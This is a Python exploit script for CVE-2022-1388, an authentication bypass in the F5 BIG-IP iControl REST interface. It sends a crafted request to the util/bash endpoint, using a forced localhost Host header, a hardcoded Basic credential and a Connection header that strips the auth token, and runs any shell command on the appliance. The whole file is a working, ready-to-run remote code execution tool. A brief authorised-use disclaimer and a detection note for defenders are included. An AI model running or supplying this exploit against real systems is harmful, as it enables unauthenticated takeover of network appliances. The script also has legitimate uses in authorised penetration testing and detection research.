#!/usr/bin/python3
# Exploit Title: F5 BIG-IP iControl REST authentication bypass leading to unauthenticated Remote Code Execution (CVE-2022-1388)
# Date: 09.05.2022
# Exploit Author: Qusai Alhaddad (SecurityKiller)
# Version: V1.0
# Tested on: F5-BigIP V11,12,13,14,15,16
import argparse
import requests
import urllib3
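# The request below is sent with verify=False, which makes urllib3 emit an
# InsecureRequestWarning on every call.  Silence only that category rather
# than every urllib3 warning, so unrelated warnings still reach the operator.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)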
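def exploit(target, command, timeout=30):
    """Run *command* on a BIG-IP host through the iControl REST ``util/bash`` endpoint.

    The request is shaped as the CVE-2022-1388 proof of concept: ``Host`` is forced to
    ``127.0.0.1``, a Basic credential (``admin:horizon3`` when decoded) and a dummy
    ``X-F5-Auth-Token`` are supplied, and ``Connection: X-F5-Auth-Token`` names the
    token header as hop-by-hop.  Public analyses of the CVE describe that last header
    as the reason the front end drops the token before the backend authorises the
    request; that mechanism is not verifiable from this script alone.

    Args:
        target:  host or IP of the BIG-IP management interface (HTTPS is assumed).
        command: shell command to run; it is wrapped in ``bash -c '...'`` verbatim, so
                 embedded single quotes are NOT escaped and will break the invocation.
        timeout: seconds to wait for the HTTP round trip (the original call had none
                 and could hang indefinitely on a filtered port).

    Returns:
        The stripped ``commandResult`` string; it is also printed to stdout.

    Raises:
        ValueError:   *command* is empty/None (previously the literal string "None"
                      was sent to bash).
        RuntimeError: the response is not the expected JSON document, which is what a
                      patched or non-vulnerable target returns.
        requests.RequestException: connection/TLS/timeout failures.

    Only use against systems you are explicitly authorised to test.  Defenders: an
    external request to ``/mgmt/tm/util/bash`` whose ``Connection`` header lists
    ``X-F5-Auth-Token`` is exactly the signature this function produces.
    """
    if not command:
        raise ValueError("command must be a non-empty string")

    url = f'https://{target}/mgmt/tm/util/bash'
    headers = {
        'Host': '127.0.0.1',
        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
        'X-F5-Auth-Token': 'asdf',
        'Connection': 'X-F5-Auth-Token',
        'Content-Type': 'application/json',
    }
    # utilCmdArgs is handed to bash on the appliance; quoting is the operator's problem.
    payload = {"command": "run", "utilCmdArgs": f"-c '{command}'"}

    # verify=False: management interfaces almost always present self-signed certs.
    r = requests.post(url, headers=headers, json=payload, verify=False, timeout=timeout)

    try:
        body = r.json()
    except ValueError as err:
        raise RuntimeError(
            f"non-JSON response (HTTP {r.status_code}) from {target}") from err
    if not isinstance(body, dict) or "commandResult" not in body:
        # A 401 error document or a non-BIG-IP service lands here instead of a KeyError.
        raise RuntimeError(
            f"unexpected response (HTTP {r.status_code}) from {target}: {body!r}")

    result = body["commandResult"].strip()
    print(result)
    return result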
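if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="CVE-2022-1388 F5 BIG-IP iControl REST auth-bypass RCE proof of concept. "
                    "Use only against systems you are authorised to test.")
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    # Required now: without -c the original sent the literal string "None" to bash.
    parser.add_argument('-c', '--command', help='The command to execute', required=True)
    args = parser.parse_args()
    try:
        exploit(args.target, args.command)
    except (requests.RequestException, ValueError, KeyError, RuntimeError) as err:
        # Network/TLS failures, a non-JSON body, or a response without commandResult
        # (patched or non-vulnerable target) end here with a one-line reason and a
        # non-zero exit instead of a traceback.
        raise SystemExit(f"[-] {args.target}: {type(err).__name__}: {err}")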